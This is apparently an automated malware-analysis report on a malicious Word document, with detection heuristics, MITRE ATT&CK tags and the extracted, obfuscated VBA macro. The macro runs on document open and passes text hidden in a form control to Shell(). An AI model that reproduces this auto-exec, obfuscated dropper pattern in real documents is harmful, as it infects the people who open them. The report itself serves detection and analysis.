MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro is triggered by the 'autoopen' event and uses the Shell() function to execute arbitrary commands. The presence of the 'autoopen' macro and the Shell() call strongly indicate malicious intent, likely to download and execute a second-stage payload.
Heuristics 7
-
ClamAV: Doc.Malware.Generic-6796551-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6796551-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/officeDocument/2006/bibliography In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4544 bytes |
SHA-256: e98f33bdcef57199e9cd8a14c19844cbce61e0e2ebabb44344e2698a5731151d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "i87670701432"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
q0087 = 90 - 239
S368 = 901 - 275
z006 = 379 - 263
z8060146
F8918 = 492 - 126
O771 = 500 - 545
w3478 = 111 - 103
End Sub
Attribute VB_Name = "U1730818151"
Function z8060146()
On Error Resume Next
Select Case r7741
Case 537
v9843 = k500
v478 = a2342
I0806 = Fix(486)
Case 814
c7597 = I4391
f1478 = 294
s229 = Oct(T389)
End Select
Select Case O7361
Case 505
h8183 = k644
O467 = u900
n525 = Fix(277)
Case 648
h139 = E4671
K6897 = 184
d363 = Oct(i267)
End Select
Select Case A599
Case 270
H5675 = r8911
w653 = w954
z393 = Fix(21)
Case 232
o007 = o5296
W3644 = 697
d881 = Oct(z9625)
End Select
I67322242 = Array(C27401257, H956881093, A01549053, Interaction.Shell(("" + S976551 + j947412 + C250113 + d32047857 + i87670701432.TextBox1) + R70180 + U1385231, 22 - 22), W874955648, i9953515, X229720)
Select Case w8929
Case 561
a1743 = E543
Z271 = X9470
E7529 = Fix(362)
Case 863
X508 = m4987
r117 = 473
s094 = Oct(b996)
End Select
Select Case N4296
Case 203
q439 = O2347
z5687 = B9809
E452 = Fix(369)
Case 787
h8770 = t0053
X2881 = 206
l2985 = Oct(A335)
End Select
Select Case z562
Case 754
X702 = Q1198
M1145 = H173
O086 = Fix(858)
Case 148
w213 = t049
X4949 = 481
q9963 = Oct(C294)
End Select
Select Case b164
Case 189
d739 = q1608
u7824 = n463
a7063 = Fix(189)
Case 9
l156 = f2490
J671 = 933
J4299 = Oct(f372)
End Select
End Function
Attribute VB_Name = "A3861806484572"
Attribute VB_Name = "I01009050929"
Attribute VB_Name = "S84084430380017"
Attribute VB_Name = "G9386019233637"
Attribute VB_Name = "X4627443918"
Attribute VB_Name = "t9961119"
Attribute VB_Name = "Q162177775681"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "n6196399"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Y026074798"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "H3241664284046"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "K563496862"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Att
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.